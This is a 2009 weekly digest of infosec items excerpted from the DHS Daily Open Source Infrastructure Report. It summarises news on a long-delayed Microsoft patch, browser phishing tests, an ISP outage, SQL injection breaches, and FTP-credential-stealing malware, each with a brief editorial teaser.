The DHS Daily Open Source
Infrastructure Report covers the publicly reported material for the preceding
day(s) not previously covered. This weekly summary provides a selection
of those items of greatest significance to the InfoSec professional.
Week Ending: Friday, August 21, 2009
Infrastructure Report for 17 August
2009
A
bug fix takes two years to release!
Should this be where you place your trust?
48. August 14, The Register – (International) MS Zero-day security bug was two years in the making. A flaw in Office Web Components which Microsoft fixed on August 11 was first reported to the software giant over two years ago, it has emerged. The time taken to release a patch has security vendors speculating that security only got around to fixing the software flaw at all because hackers have begun exploiting it over recent weeks. The arrival of the MS09-043 patch addressed a zero-day flaw that had become the fodder of drive-by download attacks from malicious web pages. The patch addressed four vulnerabilities in Office ActiveX control in total, including the zer0-day flaw. Users previously had to rely on workarounds published by Microsoft in a July advisory. The 0day security bug was discovered by a researcher and first reported to Microsoft in March 2007 via the Tipping Point Zero Day initiative scheme, which pays researchers for security exploits. Tipping Point uses this information to add signature detection against exploits based on the bug to its intrusion protection products. It also passes along the information to the relevant software developers, in this case Microsoft. Responding to question on the long delay, a ZDI manager told heise Security, “they [Microsoft] kept finding the need for more time to ensure the issue was completely addressed.” Source: http://www.theregister.co.uk/2009/08/14/ms_zero_day_long_gestation/
Infrastructure Report for 18 August
2009
Has Microsoft restored your faith? Mine remains with FireFox?
42. August 14, SCMagazine – (International) Microsoft
leads browsers in malware, phishing defense. It appears that the
comprehensive security features built into Internet Explorer 8 (IE 8) are
paying off for Microsoft. The browser, released in March with a number of
enhanced phishing and anti-malware components, blocked an average of 81 percent
of socially engineered malware and stopped 83 percent of suspected phishing
sites — topping four other major browsers, according to new tests conducted by
NSS Labs. NSS based its findings on two weeks of analyzing 593 phishing sites
and 608 unique URLS that contained malicious software, the company’s president
told SCMagazineUS.com on August 13. “Everyone thinks Microsoft stinks at
security,” he said. “They need to get some credit for some of the good stuff
they’ve done. Microsoft has been a big target for attacks for a long time, and
that’s actually a benefit to them. They’ve learned how they can turn that
around and protect themselves better.” In catching and stopping socially
engineered malware, a significant drop-off occurred after the Microsoft
browser. Firefox 3 was next in line, blocking 27 percent. Apple’s Safari 4
thwarted 21 percent, followed by Google Chrome (seven percent) and Opera 10
(one percent). The browsers, as a group, performed relatively better in
offering phishing protection. Firefox deterred 80 percent of suspected fraud
sites, Opera caught 54 percent, followed by Chrome (26 percent) and Safari (two
percent). Source: http://www.scmagazineus.com/Microsoft-leads-browsers-in-malware-phishing-defense/article/146505/
Infrastructure Report for 19 August
2009
Is
Charter a participant in your extended network?
Could you be impacted next?
40. August 17, Redding Record-Searchlight – (California) Charter Internet suffers rolling outages. Local Charter Media Internet subscribers on August 17 have been subjected to disconnections and slow speeds due to an outage that has been “rolling from area to area.” A Charter spokeswoman in Redding said company troubleshooters were notified of the problem around 10:30 a.m. She said the problem has spread through Northern and Southern California and a few other states. She did not know how many customers were affected. “We don’t know the cause, other than it’s with our third-party vendor,” she said. “Call centers have all been alerted to this, and hopefully information is getting back to customers on a timely basis.” Source: http://www.redding.com/news/2009/aug/17/charter-internet-suffers-rolling-outages/
Infrastructure Report for 20 August
2009
SQL issues again. Will it ever end?
35. August 18, SearchSecurity.com – (International)
SQL Injection continues to trouble firms, lead to breaches. SQL Injection,
one of the most basic and common attacks against websites and their underlying
databases, offer an easy entry point for cybercriminals, according to security
experts. The hackers responsible for the largest data security breach in U.S.
history allegedly used a SQL Injection attack. The coding error was cited as
the starting point in the indictment handed down against a Miami man and two
Russian hackers, enabling them to allegedly bilk Heartland Payment Systems Inc.
and Hannaford Brothers Co. of more than 130 million credit and debit card
numbers. But security experts say that while SQL Injection errors are
relatively easy to find, as simple as finding a poorly coded input field in a
Web form, they are often difficult and costly to fix. A vulnerability scan is
likely to turn up thousands of errors that lend themselves to SQL Injection,
said the chief technology officer of Citigal Inc., a software security and
quality consulting firm. New defenses for automated SQL injection attacks: By
automating SQL injection attacks, hackers have found a way to expedite the
process of finding and exploiting vulnerable websites. “Sometimes there’s one
problem that results in a thousand possible cross-site scripting issues and if
you fix that problem they’ll all be fixed, but that’s not always the case,” the
chief technology officer said. “There been a lot of bugs that built up behind
the dam and now we’re seeing the dam starting to rumble.” Source: http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1365263,00.html
Infrastructure Report for 21 August
2009
Hmmmm. Is it possible that your web development
activity is so infected?
41. August 19, Internet Evolution – (International) Nasty malware attack targets web developers. There is a nasty bug going around the Web that targets developers. When a developer visits an infected site, the page installs a virus on their machine that silently copies the passwords stored in FileZilla, CuteFTP, and possibly other File Transfer Protocol (FTP) client software, and sends them to a central server. The server then runs a bot to access all sites for which credentials have been stolen and installs an iframe injection attack on many pages, further spreading the infection. Infected sites occasionally break if they use the Web scripting language PHP, but frequently they continue to operate, and thus infect more users with the virus. When a search engine such as Google detects the infection in a site, they may remove the site from their index, resulting in a financial loss to the site owner. Some browsers may flag the site as infected and show a warning that scares away users. This attack is interesting because of the way it spreads, and the risk to developers. No one would want to be the freelance Web professional who has to explain to a few dozen clients why their sites all got hacked. Presumably, this attack vector will eventually be used to install a payload, such as software for sending spam or executing denial-of-service attacks. After all, today’s best malware is all about making money. Source: http://www.internetevolution.com/author.asp?section_id=732&doc_id=180663
Note: The DHS only maintains the last ten days
of their reports online. To obtain copies of earlier reports or complete
summaries, go to: